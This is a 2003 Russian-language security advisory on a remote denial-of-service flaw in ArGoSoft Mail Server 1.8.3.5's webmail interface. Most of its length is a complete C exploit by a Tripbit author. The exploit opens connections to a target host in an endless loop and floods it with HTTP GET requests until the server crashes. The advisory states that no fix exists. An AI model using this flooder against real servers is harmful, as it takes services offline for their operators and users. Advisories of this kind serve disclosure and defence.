Security Lab

Удаленный DoS против ArGoSoft Mail Server

Дата публикации:16.06.2003
Всего просмотров:1526
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в почтовом сервере ArGoSoft. Удаленный пользователь может аварийно завершить работу сервера.

Сообщается, что удаленный пользователь может выпустить большое количество HTTP GET запросов к webmail интерфейсу, чтобы аварийно завершить работу сервера. Эксплоит:

*     Denial of Service Attack against ArGoSoft Mail Server Version 1.8 
(1.8.3.5)
*    
*    Tripbit Security Development
*    ---------------------------------
 
*    Author: posidron
 
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*    [-] IRC: irc.euirc.net 6667 #tripbit
 
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
 
**********************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
 
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;
    char sendstring[1024];
    
    strcpy(sendstring, "GET  /index.html HTTP/1.0\n\n");
    
    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n", argv[0]);
        exit(0);
    }
    
    port = atoi(argv[2]);
    
    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }
    
    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);
    
    printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
    
    for(;;)
    {
        if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
        {
            printf("socket() failed!\n");
            exit(0);
        }

        if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
        {
            printf("connect() failed!\n");
            close(sockfd);
        }
        
        if (write(sockfd, sendstring, strlen(sendstring)) < 0)
        {
            break;
        }
        
        close(sockfd);
    }

    printf("Attack done!...\n");
Уязвимость обнаружена в ArGoSoft Mail Server 1.8.3.5 Freeware version

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Denial of Service Attack against ArGoSoft Mail Server Version 1.8